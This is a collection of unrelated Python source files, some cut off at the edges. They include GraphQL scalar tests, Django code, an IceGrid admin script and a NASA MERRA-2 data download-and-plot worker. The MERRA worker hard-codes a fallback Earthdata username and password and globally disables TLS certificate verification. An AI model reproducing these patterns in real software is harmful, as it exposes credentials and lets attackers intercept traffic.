raise Exception('Deve haver o atributo inteiro \'column\'')
else:
data = {}
data['line'] = value.get('line')
data['column'] = value.get('column')
value = data
self.__data[attr] = value
return _set
def __repr__(self):
return f'{self.id}:{self.name}:[{self.begin.get("line")}-{self.begin.get("column")}]:[{self.ending.get("line")}-{self.ending.get("column")}]'
def __mul__(self, value):
ret = [self]
for _ in range(value - 1):
ret.append(Scope())
return ret
name = property(__get__('name'), __set__('name'))
id = property(__get__('id'), __set__('id'))
begin = property(__get__('begin'), __set__('begin'))
ending = property(__get__('ending'), __set__('ending'))
|
from kicker.SymbolMapper import SymbolMapper
class ConsoleView(object):
def __init__(self):
self.header = "Current user input state:"
self.pattern = "{0: <30}{1} {2} {3} {4}"
self.mapper = SymbolMapper()
def renderView(self, inputs):
mapped = self.mapper.inputs2symbols(inputs)
rotation = mapped[1::2]
translation = mapped[0::2]
self.clearView()
self.printHeader(inputs)
self.printSeparator()
self.printNewline(2)
self.printRotation(rotation)
self.printNewline(2)
self.printTranslation(translation)
self.printNewline(2)
self.printSeparator()
def printSeparator(self):
print("-" * 60)
def printHeader(self, inputs):
print(self.header, inputs)
def printRotation(self, rotation):
print(self.pattern.format(" ", "G", "D", "M", "S"))
self.printNewline(1)
print(self.pattern.format("Rotation",
rotation[0], rotation[1], rotation[2], rotation[3]))
# print self.pattern.format("Rotation ", **rotation)
def printTranslation(self, translation):
print(self.pattern.format(" ", "G", "D", "M", "S"))
self.printNewline(1)
print(self.pattern.format("Translation ",
translation[0], translation[1], translation[2], translation[3]))
# print self.pattern.format("Translation", **translation)
def printNewline(self, number):
print("\n" * number,)
def clearView(self):
import os
os.system('clear')
|
#$Id$
from books.model.PageContext import PageContext
class ContactList:
"""This class is used to create an object for contact list."""
def __init__(self):
""" Initialize contacts list and page context."""
self.contacts = []
self.page_context = PageContext()
def set_contacts(self, contact):
"""Insert contact object to contacts list.
Args:
contact(instance): Contact object.
"""
self.contacts.append(contact)
def get_contacts(self):
"""Get contacts list.
Returns:
list: List of contacts object.
"""
return self.contacts
def set_page_context(self, page_context):
"""Set page context.
Args:
instance: Page_context object.
"""
self.page_context = page_context
def get_page_context(self):
"""Get page context.
Returns:
instance: Page context object.
"""
return self.page_context
|
from __future__ import absolute_import
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from common.utils import encapsulate
from permissions.models import Permission
from .api import get_job_list
from .permissions import PERMISSION_VIEW_JOB_LIST
def job_list(request):
Permission.objects.check_permissions(request.user, [PERMISSION_VIEW_JOB_LIST])
context = {
'object_list': get_job_list(),
'title': _(u'interval jobs'),
'extra_columns': [
{
'name': _(u'label'),
'attribute': encapsulate(lambda job: job['title'])
},
{
'name': _(u'start date time'),
'attribute': encapsulate(lambda job: job['job'].trigger.start_date)
},
{
'name': _(u'interval'),
'attribute': encapsulate(lambda job: job['job'].trigger.interval)
},
],
'hide_object': True,
}
return render_to_response('generic_list.html', context,
context_instance=RequestContext(request))
|
from decimal import Decimal
import pytest
from tartiflette.scalar.builtins.int import ScalarInt
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Int cannot represent non-integer value: < None >."),
(True, False, 1),
(False, False, 0),
("", True, "Int cannot represent non-integer value: < >."),
(0, False, 0),
(1, False, 1),
(3, False, 3),
(
-2_147_483_649,
True,
"Int cannot represent non 32-bit signed integer value: < -2147483649 >.",
),
(
2_147_483_648,
True,
"Int cannot represent non 32-bit signed integer value: < 2147483648 >.",
),
(0.0, False, 0),
(1.0, False, 1),
(3.0, False, 3),
(0.1, True, "Int cannot represent non-integer value: < 0.1 >."),
(1.1, True, "Int cannot represent non-integer value: < 1.1 >."),
(3.1, True, "Int cannot represent non-integer value: < 3.1 >."),
(Decimal(0.0), False, 0),
(Decimal(1.0), False, 1),
(Decimal(3.0), False, 3),
(
Decimal(0.1),
True,
"Int cannot represent non-integer value: < 0.1000000000000000055511151231257827021181583404541015625 >.",
),
(
Decimal(1.1),
True,
"Int cannot represent non-integer value: < 1.100000000000000088817841970012523233890533447265625 >.",
),
(
Decimal(3.1),
True,
"Int cannot represent non-integer value: < 3.100000000000000088817841970012523233890533447265625 >.",
),
("0", False, 0),
("1", False, 1),
("3", False, 3),
("0.0", False, 0),
("1.0", False, 1),
("3.0", False, 3),
("0.1", True, "Int cannot represent non-integer value: < 0.1 >."),
("1.1", True, "Int cannot represent non-integer value: < 1.1 >."),
("3.1", True, "Int cannot represent non-integer value: < 3.1 >."),
("0e0", False, 0),
("1e0", False, 1),
("3e0", False, 3),
("0e1", False, 0),
("1e1", False, 10),
("3e1", False, 30),
("0.1e1", False, 1),
("1.1e1", False, 11),
("3.1e1", False, 31),
(
"0.11e1",
True,
"Int cannot represent non-integer value: < 0.11e1 >.",
),
(
"1.11e1",
True,
"Int cannot represent non-integer value: < 1.11e1 >.",
),
(
"3.11e1",
True,
"Int cannot represent non-integer value: < 3.11e1 >.",
),
(
float("inf"),
True,
"Int cannot represent non-integer value: < inf >.",
),
("A", True, "Int cannot represent non-integer value: < A >."),
("{}", True, "Int cannot represent non-integer value: < {} >."),
({}, True, "Int cannot represent non-integer value: < {} >."),
(
Exception("LOL"),
True,
"Int cannot represent non-integer value: < LOL >.",
),
(
Exception,
True,
"Int cannot represent non-integer value: < <class 'Exception'> >.",
),
],
)
def test_scalar_int_coerce_output(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarInt().coerce_output(value)
else:
assert ScalarInt().coerce_output(value) == expected
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Int cannot represent non-integer value: < None >."),
(True, True, "Int cannot represent non-integer value: < True >."),
(False, True, "Int cannot represent non-integer value: < False >."),
("", True, "Int cannot represent non-integer value: < >."),
(0, False, 0),
(1, False, 1),
(3, False, 3),
(0.0, False, 0),
(1.0, False, 1),
(3.0, False, 3),
(
-2_147_483_649,
True,
"Int cannot represent non 32-bit signed integer value: < -2147483649 >.",
),
(
2_147_483_648,
True,
"Int cannot represent non 32-bit signed integer value: < 2147483648 >.",
),
(0.1, True, "Int cannot represent non-integer value: < 0.1 >."),
(1.1, True, "Int cannot represent non-integer value: < 1.1 >."),
(3.1, True, "Int cannot represent non-integer value: < 3.1 >."),
("0", True, "Int cannot represent non-integer value: < 0 >."),
("1", True, "Int cannot represent non-integer value: < 1 >."),
("3", True, "Int cannot represent non-integer value: < 3 >."),
("0.0", True, "Int cannot represent non-integer value: < 0.0 >."),
("1.0", True, "Int cannot represent non-integer value: < 1.0 >."),
("3.0", True, "Int cannot represent non-integer value: < 3.0 >."),
("0.1", True, "Int cannot represent non-integer value: < 0.1 >."),
("1.1", True, "Int cannot represent non-integer value: < 1.1 >."),
("3.1", True, "Int cannot represent non-integer value: < 3.1 >."),
("0e0", True, "Int cannot represent non-integer value: < 0e0 >."),
("1e0", True, "Int cannot represent non-integer value: < 1e0 >."),
("3e0", True, "Int cannot represent non-integer value: < 3e0 >."),
("0e1", True, "Int cannot represent non-integer value: < 0e1 >."),
("1e1", True, "Int cannot represent non-integer value: < 1e1 >."),
("3e1", True, "Int cannot represent non-integer value: < 3e1 >."),
("0.1e1", True, "Int cannot represent non-integer value: < 0.1e1 >."),
("1.1e1", True, "Int cannot represent non-integer value: < 1.1e1 >."),
("3.1e1", True, "Int cannot represent non-integer value: < 3.1e1 >."),
(
"0.11e1",
True,
"Int cannot represent non-integer value: < 0.11e1 >.",
),
(
"1.11e1",
True,
"Int cannot represent non-integer value: < 1.11e1 >.",
),
(
"3.11e1",
True,
"Int cannot represent non-integer value: < 3.11e1 >.",
),
(
float("inf"),
True,
"Int cannot represent non-integer value: < inf >.",
),
("A", True, "Int cannot represent non-integer value: < A >."),
("{}", True, "Int cannot represent non-integer value: < {} >."),
({}, True, "Int cannot represent non-integer value: < {} >."),
(
Exception("LOL"),
True,
"Int cannot represent non-integer value: < LOL >.",
),
(
Exception,
True,
"Int cannot represent non-integer value: < <class 'Exception'> >.",
),
],
)
def test_scalar_int_coerce_input(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarInt().coerce_input(value)
else:
assert ScalarInt().coerce_input(value) == expected
|
"""Test that `if` in formatted string literal won't break Pylint."""
# pylint: disable=missing-docstring, pointless-statement, using-constant-test
f'{"+" if True else "-"}'
if True:
pass
elif True:
pass
|
#*************************************************************************************************************************
#import the required Python libraries. If any of the following import commands fail check the local Python environment
#and install any missing packages.
#*************************************************************************************************************************import json
import pathlib
import pika
import base64
import numpy as np
from netCDF4 import Dataset
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
import io
import logging
import os.path
import sys
import json
import urllib3
import certifi
import requests
from time import sleep
from http.cookiejar import CookieJar
import urllib.request
from urllib.parse import urlencode
import getpass
import ssl
import os
ssl._create_default_https_context = ssl._create_unverified_context
#Initialize the urllib PoolManager and set the base URL for the API requests that will be sent to the GES DISC subsetting service.
# Create a urllib PoolManager instance to make requests.
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED',ca_certs=certifi.where())
# Set the URL for the GES DISC subset service endpoint
url = 'https://disc.gsfc.nasa.gov/service/subset/jsonwsp'
################################################### RABBITMQ CODE BEGINS ###############################################################################
# establish connection with rabbitmq server
logger = logging.getLogger('django')
connection = pika.BlockingConnection(pika.ConnectionParameters('orion-rabbit'))
channel = connection.channel()
logger.info(" Connected to RBmq server")
#create/ declare queue
channel.queue_declare(queue='merra_plot_rx')
################################################### RABBITMQ CODE BEGINS ###############################################################################
# definea a local general-purpose method that submits a JSON-formatted Web Services Protocol (WSP) request to the GES DISC server, checks for any errors, and then returns the response.
# This method is created for convenience as this task will be repeated more than once.
# This method POSTs formatted JSON WSP requests to the GES DISC endpoint URL
# It is created for convenience since this task will be repeated more than once
def get_http_data(request):
#logger.info('request',request['methodname'])
hdrs = {'Content-Type': 'application/json',
'Accept' : 'application/json'}
data = json.dumps(request)
#logger.info('data:',data)
#logger.info("url",url)
r = http.request('POST', url, body=data, headers=hdrs)
response = json.loads(r.data)
#logger.info('response:',response['type'])
# Check for errors
if response['type'] == 'jsonwsp/fault' :
logger.info('API Error: faulty %s request' % response['methodname'])
sys.exit(1)
return response
# The following method constructs the and returns the Subsetted records
def constructSubsetData(minLatitude,maxLatitude, minLongitude, maxLongitude, date):
# Define the parameters for the data subset
# product = 'M2I3NPASM_V5.12.4'
# # varNames =['T', 'RH', 'O3']
# varNames =['T']
# minlon = -180
# maxlon = 180
# minlat = -90
# maxlat = -45
# begTime = '1980-01-01'
# endTime = '1980-01-01'
# begHour = '00:00'
# endHour = '00:00'
# Define the parameters for the data subset
product = 'M2I3NPASM_V5.12.4'
varNames =['T']
minlat = int(minLatitude)
minlon = int(minLongitude)
maxlat = int(maxLatitude)
maxlon = int(maxLongitude)
begTime = date
endTime = date
begHour = '00:00'
endHour = '00:00'
#logger.info("Beg time:",begTime)
# Subset only the mandatory pressure levels (units are hPa)
# 1000 925 850 700 500 400 300 250 200 150 100 70 50 30 20 10 7 5 3 2 1
dimName = 'lev'
dimVals = [1,4,7,13,17,19,21,22,23,24,25,26,27,29,30,31,32,33,35,36,37]
# Construct the list of dimension name:value pairs to specify the desired subset
dimSlice = []
for i in range(len(dimVals)):
dimSlice.append({'dimensionId': dimName, 'dimensionValue': dimVals[i]})
#logger.info('dimSlice:',dimSlice)
# Construct JSON WSP request for API method: subset
subset_request = {
'methodname': 'subset',
'type': 'jsonwsp/request',
'version': '1.0',
'args': {
'role' : 'subset',
'start' : begTime,
'end' : begTime,
'box' : [minlon, minlat, maxlon, maxlat],
'crop' : True,
'data': [{'datasetId': product,
'variable' : varNames[0],
'slice': dimSlice
}]
}
}
#logger.info("subset request:",subset_request['args']['box'])
# Submit the subset request to the GES DISC Server
response = get_http_data(subset_request)
# Report the JobID and initial status
myJobId = response['result']['jobId']
#logger.info('Job ID: '+myJobId)
#logger.info('Job status: '+response['result']['Status'])
# Construct JSON WSP request for API method: GetStatus
status_request = {
'methodname': 'GetStatus',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {'jobId': myJobId}
}
# Check on the job status after a brief nap
while response['result']['Status'] in ['Accepted', 'Running']:
sleep(5)
response = get_http_data(status_request)
status = response['result']['Status']
percent = response['result']['PercentCompleted']
#logger.info('Job status: %s (%d%c complete)' % (status,percent,'%'))
if response['result']['Status'] == 'Succeeded' :
logger.info('Job Finished: %s' % response['result']['message'])
else :
logger.info('Job Failed: %s' % response['fault']['code'])
sys.exit(1)
# Construct JSON WSP request for API method: GetResult
batchsize = 20
results_request = {
'methodname': 'GetResult',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {
'jobId': myJobId,
'count': batchsize,
'startIndex': 0
}
}
# Retrieve the results in JSON in multiple batches
# Initialize variables, then submit the first GetResults request
# Add the results from this batch to the list and increment the count
results = []
count = 0
#logger.info("result request:",results_request)
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Increment the startIndex and keep asking for more results until we have them all
total = response['result']['totalResults']
while count < total :
results_request['args']['startIndex'] += batchsize
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Check on the bookkeeping
logger.info('Retrieved %d out of %d expected items' % (len(results), total))
# Sort the results into documents and URLs
docs = []
urls = []
for item in results :
try:
# print('{} Item:'.format(item))
if item['start'] and item['end'] : urls.append(item)
except:
docs.append(item)
# Print out the documentation links, but do not download them
# print('\nDocumentation:')
# for item in docs : print(item['label']+': '+item['link'])
print('Iam here')
return urls
# Login and Download merra data
def downloadMerraData(username,password,minLatitude,maxLatitude, minLongitude, maxLongitude, date):
# Earthdata Login
if not username:
username = 'teamorion2022'
if not password:
password = 'AdsSpring2022'
# Create a password manager to deal with the 401 response that is returned from
password_manager = urllib.request.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None, "https://urs.earthdata.nasa.gov", username, password)
# Create a cookie jar for storing cookies. This is used to store and return the session cookie #given to use by the data server
cookie_jar = CookieJar()
# Install all the handlers.
opener = urllib.request.build_opener (urllib.request.HTTPBasicAuthHandler (password_manager),urllib.request.HTTPCookieProcessor (cookie_jar))
urllib.request.install_opener(opener)
# Open a request for the data, and download files
#logger.info('\n HTTP_services output:')
urls=constructSubsetData(minLatitude,maxLatitude, minLongitude, maxLongitude, date)
# logger.info(urls['link'])
print("This is url stuff: {}".format(urls))
# print('I am also here 1')
url = urls[0]['link']
#logger.info('URL : {}'.format(URL))
DataRequest = urllib.request.Request(url)
DataResponse = urllib.request.urlopen(DataRequest)
DataBody = DataResponse.read()
# print("This is dataBody: {}".format(DataBody))
print('I am also here 2')
"""response = {}
response['fileName'] = urls[0]['label']
response['dataBody'] = DataBody"""
response = {}
# dirName='test'
# if not os.path.isdir(dirName):
# print('The directory is not present. Creating a new one..')
# # print('Current Working Directory:{} '.format(os.getcwd()))
# os.mkdir(dirName)
# print('Current Working Directory after directory change :{} '.format( os.getcwd()))
# else:
# print('The directory is present.')
# Save file to working directory
# print("File details: {}".format(urls))
try:
file_name = urls[0]['label']
file_ = open(file_name, 'wb')
file_.write(DataBody)
file_.close()
print (file_name, " is downloaded")
except requests.exceptions.HTTPError as e:
print('Exception occured : :{}'.format(e))
print('Downloading is done and find the downloaded files in your current working directory')
# logger.info("response from download:",response['fileName'])
# logger.info("type of response:",type(response))
response['fileName'] =file_name
# response['data'] = DataBody
return response
#unpack the data in message and process the message and return the output
def process_req(request):
json_data = json.loads(request)
#logger.info(json_data)
username = json_data['username']
password = json_data['password']
minLatitude = json_data['minLatitude']
maxLatitude = json_data['maxLatitude']
minLongitude = json_data['minLongitude']
maxLongitude = json_data['maxLongitude']
date = json_data['merraDate']
urls=downloadMerraData(username,password,minLatitude,maxLatitude, minLongitude, maxLongitude, date)
# logger.info("type of urls:",type(urls))
#logger.info("urls:",urls['fileName'])
return urls
# plot service function
def plotsService(body):
b64 = []
# logger.info("type of body:",type(body))
print("Filename:{}".format(body))
# print("Path exists:{}".format(body))
#logger.info(json_data)
file_name = body['fileName']
print("Path exists:{}".format(os.path.exists(file_name)))
#logger.info(file_name, " is downloaded")
print('Downloading is done and find the downloaded files in your current working directory')
#Read in NetCDF4 file (add a directory path if necessary):
# print("This is the path:{}".format(os.getcwd()+"/"+file_name))
# print("Files in current directory: {}".format(os.listdir(os.getcwd())))
# print("Files in root directory: {}".format(os.listdir("/")))
# print("Filename in str {}".format(str(file_name)))
# path2 = os.PathLike()
# print("This is path: {}".format(path2))
data = Dataset(file_name, mode='r')
# data = body['data']
# Run the following line below to print MERRA-2 metadata. This line will print attribute and variable information. From the 'variables(dimensions)' list, choose which variable(s) to read in below.
#logger.info(data)
# Read in the 'T2M' 2-meter air temperature variable:
lons = data.variables['lon'][:]
lats = data.variables['lat'][:]
T2M = data.variables['T'][:,:,:]
# If using MERRA-2 data with multiple time indices in the file, the following line will extract only the first time index.
# Note: Changing T2M[0,:,:] to T2M[10,:,:] will subset to the 11th time index.
T2M = T2M[0,0,:]
#logger.info(T2M)
# Plot the data using matplotlib and cartopy
# Set the figure size, projection, and extent
fig = plt.figure(figsize=(8,4))
ax = plt.axes(projection=ccrs.Robinson())
ax.set_global()
ax.coastlines(resolution="110m",linewidth=1)
ax.gridlines(linestyle='--',color='black')
# Set contour levels, then draw the plot and a colorbar
clevs = np.arange(230,311,5)
plt.contourf(lons, lats, T2M, clevs, transform=ccrs.PlateCarree(),cmap=plt.cm.jet)
plt.title('MERRA-2 Air Temperature at 2m, January 2010', size=14)
cb = plt.colorbar(ax=ax, orientation="vertical", pad=0.02, aspect=16, shrink=0.8)
cb.set_label('K',size=12,rotation=0,labelpad=15)
cb.ax.tick_params(labelsize=10)
# Save the plot as a PNG image
fig.savefig('MERRA2_t2m.png', format='png', dpi=360)
flike = io.BytesIO()
plt.savefig(flike)
#logger.info(b64)
b64.append(base64.b64encode(flike.getvalue()).decode())
return b64
################################################### RABBITMQ CODE ###############################################################################
#callback function for the queue
def on_request(ch, method, props, body):
#logger.info(" [.] Received this data %s", body)
response = process_req(body)
print("Response:{} ".format(response['fileName']))
finalprocess=plotsService(response)
ch.basic_publish(exchange='', routing_key=props.reply_to, properties=pika.BasicProperties(correlation_id = props.correlation_id), body=json.dumps(finalprocess))
ch.basic_ack(delivery_tag=method.delivery_tag)
# We might want to run more than one server process.
# In order to spread the load equally over multiple servers we need to set the prefetch_count setting.
channel.basic_qos(prefetch_count=1)
# We declare a callback "on_request" for basic_consume, the core of the RPC server. It's executed when the request is received.
channel.basic_consume(queue='merra_plot_rx', on_message_callback=on_request)
print(" [x] Awaiting RPC requests")
channel.start_consuming()
channel.close()
################################################### RABBITMQ CODE ENDS ###############################################################################
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
from math import ceil, sqrt
from PIL import Image
MODES = ('palette', 'grayscale')
PALETTE = [
0x000000, # 0 — black
0x000080, # 1 — maroon
0x008000, # 2 — green
0x008080, # 3 — olive
0x800000, # 4 — navy
0x800080, # 5 — purple
0x808000, # 6 — teal
0xc0c0c0, # 7 — silver
0x808080, # 8 — gray
0x0000ff, # 9 — red
0x00ff00, # 10 — lime
0x00ffff, # 11 — yellow
0xff0000, # 12 — blue
0xff00ff, # 13 — fuchsia
0xffff00, # 14 — aqua
0xffffff # 15 — white
]
def create_parser():
"""Create application argument parser."""
parser = argparse.ArgumentParser(
description='Convert given file to a bitmap.')
parser.add_argument('input', help='a file to convert')
parser.add_argument('output', help='path to the file to save')
parser.add_argument(
'-m, --mode', default='palette', choices=MODES, dest='mode',
help='converting mode. One of: "palette" (each byte converted to two '
'pixels using 16-color palette, default), "grayscale" (each byte '
'value represented as grayscale)')
return parser
def convert(data, mode):
"""Convert given file to bitmap.
:param bytes data: input data to convert to a bitmap
:param str mode: one of the values:
* palette - represent each byte as two pixels using 16-color palette
* grayscale - represent each byte as one grayscale pixel using its value
:return: result image
:rtype: Image.Image
"""
if mode not in MODES:
raise ValueError('mode not one of the values: {}'.format(MODES))
length = len(data)
if mode == 'palette':
length *= 2
img_mode = 'L' if mode == 'grayscale' else 'RGB'
size = int(ceil(sqrt(length)))
img = Image.new(img_mode, (size, size))
for i in range(len(data)):
if mode == 'grayscale':
add_pixel(img, i, size, data[i])
elif mode == 'palette':
add_pixel(img, i * 2, size, PALETTE[data[i] // 16])
add_pixel(img, i * 2 + 1, size, PALETTE[data[i] % 16])
return img
def add_pixel(img, index, size, pixel):
"""Add a pixel to the image at (index % size, index / size).
:param Image.Image img: image to alter
:param int index: index of the byte
:param int size: width of the image
:param int pixel: pixel value to set
"""
img.putpixel((index % size, index // size), pixel)
def main():
args = create_parser().parse_args()
data = open(args.input, 'rb').read()
convert(data, args.mode).save(args.output)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Show the native byte order.
"""
#end_pymotw_header
import sys
print sys.byteorder
|
async def leaves(voice_client):
await voice_client.disconnect()
|
# Generated by Django 3.1 on 2021-10-26 22:07
from django.db import migrations, models
from django.contrib.auth.models import User
import reversion
ADMIN_USERNAME = 'biobankadmin'
def create_buffy_coat_sample_kind(apps, schema_editor):
SampleKind = apps.get_model("fms_core", "SampleKind")
admin_user = User.objects.get(username=ADMIN_USERNAME)
with reversion.create_revision(manage_manually=True):
reversion.set_comment("Add new sample kind buffy coat.")
reversion.set_user(admin_user)
buffy_coat = SampleKind.objects.create(name="BUFFY COAT", created_by_id=admin_user.id, updated_by_id=admin_user.id)
reversion.add_to_revision(buffy_coat)
class Migration(migrations.Migration):
dependencies = [
('fms_core', '0023_v3_4_0'),
]
operations = [
migrations.AlterField(
model_name='container',
name='kind',
field=models.CharField(choices=[('infinium gs 24 beadchip', 'infinium gs 24 beadchip'), ('tube', 'tube'), ('tube strip 2x1', 'tube strip 2x1'), ('tube strip 3x1', 'tube strip 3x1'), ('tube strip 4x1', 'tube strip 4x1'), ('tube strip 5x1', 'tube strip 5x1'), ('tube strip 6x1', 'tube strip 6x1'), ('tube strip 7x1', 'tube strip 7x1'), ('tube strip 8x1', 'tube strip 8x1'), ('96-well plate', '96-well plate'), ('384-well plate', '384-well plate'), ('tube box 3x3', 'tube box 3x3'), ('tube box 6x6', 'tube box 6x6'), ('tube box 7x7', 'tube box 7x7'), ('tube box 8x8', 'tube box 8x8'), ('tube box 9x9', 'tube box 9x9'), ('tube box 10x10', 'tube box 10x10'), ('tube box 21x10', 'tube box 21x10'), ('tube rack 8x12', 'tube rack 8x12'), ('box', 'box'), ('drawer', 'drawer'), ('freezer rack 2x4', 'freezer rack 2x4'), ('freezer rack 3x4', 'freezer rack 3x4'), ('freezer rack 4x4', 'freezer rack 4x4'), ('freezer rack 5x4', 'freezer rack 5x4'), ('freezer rack 6x4', 'freezer rack 6x4'), ('freezer rack 7x4', 'freezer rack 7x4'), ('freezer rack 10x5', 'freezer rack 10x5'), ('freezer rack 8x6', 'freezer rack 8x6'), ('freezer rack 11x6', 'freezer rack 11x6'), ('freezer rack 11x7', 'freezer rack 11x7'), ('freezer 3 shelves', 'freezer 3 shelves'), ('freezer 4 shelves', 'freezer 4 shelves'), ('freezer 5 shelves', 'freezer 5 shelves'), ('room', 'room')], help_text='What kind of container this is. Dictates the coordinate system and other container-specific properties.', max_length=25),
),
migrations.RunPython(
create_buffy_coat_sample_kind,
reverse_code=migrations.RunPython.noop,
),
]
|
"""
Author : Robin Phoeng
Date : 21/06/2018
"""
class Bar:
"""
A stress bar in the Fate SRD
box indexes start at 1
"""
def __init__(self,name):
self.name = name
self.boxes = []
def add_box(self,box):
"""
Adds a new box to the bar
:param box: a box, must be of Box type
"""
assert isinstance(box,Box)
self.boxes.append(box)
def remove_box(self,index):
"""
Removes a box at specified index.
indexes start at 1
:param index:
:return: Box removed
:raises: KeyError if not at index
"""
return self.boxes.pop(index-1)
def refresh(self):
"""
refrehes all boxes
"""
for box in self.boxes:
box.refresh()
def spend(self):
"""
spend all boxess
"""
for box in self.boxes:
box.spend()
def __getitem__(self, index):
"""
retrieves an item
we start our indexing at 1.
:param index: index, must be integer
:return: the Box at the index
"""
return self.boxes[index-1]
def __str__(self):
output = ""
output += self.name
for box in self.boxes:
output += " " + str(box)
return output
class Box:
"""
A bar consists of boxes
"""
def __init__(self,size):
self.size = size
self.used = False
def spend(self):
"""
toggle box as used
"""
self.used = True
def refresh(self):
"""
toggle box as unused
"""
self.used = False
def is_spent(self):
"""
query method
:return: true if used, false if not
"""
return self.used
def __str__(self):
if self.used:
return "~~[%d]~~" % self.size
else:
return "[%d]" % self.size
|
#!/usr/bin/python
"""Script to add, update, list or remove the grid application.
Usage::
grid_admin.py [add|update|list|remove|show-xml]
* add: adds or updates the grid application
* update: updates the application (assumes it is already loaded)
* list: lists all loaded applications
* remove: removes the grid application
* show-xml: shows the generated XML without updating anything
The application configuration is generated from from ``application.yml``
and ``piller/platform/*.sls``.
Each service corresponds to an executable Ice server. The ``application.yml``
file should have a ``services`` entry whose value is a list of service
descriptions, and an ``application`` entry whose value is the application name.
Each service must define (string) values for the following keys:
* name: name of the service from which adapter ids are generated
* runs: path of the executable, relative to the APP_ROOT
The following additional keys are optional:
* replicated: may be True, False or (the string) both
* nodes: may be a node id (string) or list of node ids
If ``replicated`` is False or absent, an adapter with id equal to the name is
generated. This means that the full adapter id on a given node is
``<name>-<node>.<name>``, e.g. ``Printer-node2.Printer``.
If ``replicated`` is True, an adapter-id of the form ``<name>Rep`` is
generated so that the full adapter id on a given node is
``<name>-<node>.<name>Rep``, e.g. ``Printer-node2.PrinterRep``.
Furthermore the adapter is added to an adapter-group of ``<name>Group``.
If ``replicated`` is ``both``, both of the above adapters are generated.
When ``nodes`` is not specified, the service is generated on all nodes.
If ``nodes`` is a node id, the service is generated on that node only,
while if it is a list of node ids it is generated for just those nodes.
"""
import os
import sys
import yaml
from icegrid_config import ICE_REG_HOST
APP_ROOT = os.path.abspath(__file__).rsplit('/', 2)[0]
PLATFORM_SLS = os.path.join(APP_ROOT, 'pillar/platform')
GRID_XML_PATH = os.path.join(APP_ROOT, 'grid/grid.xml')
CLIENT_CFG = os.path.join(APP_ROOT, 'grid/client.cfg')
APP_CONF = yaml.load(open(os.path.join(APP_ROOT, 'application.yml')))
APP_NAME = APP_CONF['application']
ADMIN_CMD = "icegridadmin --Ice.Config=%s -ux -px -e '%%s'" % CLIENT_CFG
APP_FRAG = """\
<icegrid>
<application name="%s">
%s%s </application>
</icegrid>
"""
NODE_FRAG = """
<node name="%s">
%s </node>
"""
ADAPTER_FRAG = """\
<adapter name="%(name)s" endpoints="tcp"/>
"""
REPL_ADAPTER_FRAG = """\
<adapter name="%(name)sRep" replica-group="%(name)sGroup" endpoints="tcp"/>
"""
SERVER_FRAG = """\
<server id="%(name)s-%(node)s" exe="%(run)s" activation="on-demand">
%(opt)s%(adapter)s </server>
"""
OPT_FRAG = """\
<option>%s</option>
"""
GROUP_FRAG = """\
<replica-group id="%sGroup">
<load-balancing type="round-robin" />
</replica-group>
"""
def doAdmin(cmd):
return os.system(ADMIN_CMD % cmd)
def queryAdmin(cmd):
return os.popen(ADMIN_CMD % cmd)
def gridXML():
hosts = {}
for name in os.listdir(PLATFORM_SLS):
if not name.endswith('.sls'):
continue
try:
config = yaml.load(open(os.path.join(PLATFORM_SLS, name)))
if config['registry'] == ICE_REG_HOST:
hosts.update(config['hosts'])
except Exception, e:
print >>sys.stderr, 'Warning: exception %e loading %s' % (e, name)
groups_xml = []
services = APP_CONF['services']
for service in services:
args = service.get('args', [])
if isinstance(args, basestring):
args = [args]
if 'setup' in service:
assert 'run' not in service, "Service %(name)s may specify only one of 'setup' or 'run'" % service
service['run'] = 'servers/gen_server.py'
args.insert(0, service['setup'])
if service['run'].endswith('.py'):
args.insert(0, service['run'])
service['run'] = 'python'
if isinstance(service.get('nodes'), basestring):
service['nodes'] = [service['nodes']]
adapter_xml = []
if service.get('replicated') in (None, False, 'both'):
adapter_xml.append(ADAPTER_FRAG % service)
if service.get('replicated') in (True, 'both'):
adapter_xml.append(REPL_ADAPTER_FRAG % service)
groups_xml.append(GROUP_FRAG % service['name'])
opts = [OPT_FRAG % arg for arg in args]
service['adapter'] = ''.join(adapter_xml)
service['opt'] = ''.join(opts)
node_xml = []
for hostname in sorted(hosts):
node = 'node' + hostname.rsplit('-', 1)[-1]
server_xml = []
for service in services:
nodes = service.get('nodes')
if nodes is not None and node not in nodes:
continue
service['node'] = node
server_xml.append(SERVER_FRAG % service)
node_xml.append(NODE_FRAG % (node, ''.join(server_xml)))
return APP_FRAG % (APP_NAME, ''.join(groups_xml), ''.join(node_xml))
def writeGridXML():
xml = gridXML()
with open(GRID_XML_PATH, 'w') as out:
out.write(xml)
def main():
if 'add' in sys.argv[1:]:
apps = [l.strip() for l in queryAdmin('application list')]
what = 'update' if APP_NAME in apps else 'add'
writeGridXML()
doAdmin('application %s %s' % (what, GRID_XML_PATH))
elif 'update' in sys.argv[1:]:
writeGridXML()
doAdmin('application update %s' % GRID_XML_PATH)
elif 'list' in sys.argv[1:]:
for l in queryAdmin('application list'):
print l.strip()
elif 'remove' in sys.argv[1:]:
doAdmin('application remove %s' % APP_NAME)
elif 'show-xml' in sys.argv[1:]:
print gridXML(),
if __name__ == '__main__':
main()
|
"""Special rectangles."""
__all__ = [
"ScreenRectangle",
"FullScreenRectangle",
"FullScreenFadeRectangle",
"PictureInPictureFrame",
]
from manim.utils.deprecation import deprecated
from .. import config
from ..constants import *
from ..mobject.geometry import Rectangle
from ..utils.color import BLACK
class ScreenRectangle(Rectangle):
def __init__(self, aspect_ratio=16.0 / 9.0, height=4, **kwargs):
super().__init__(width=aspect_ratio * height, height=height, **kwargs)
@property
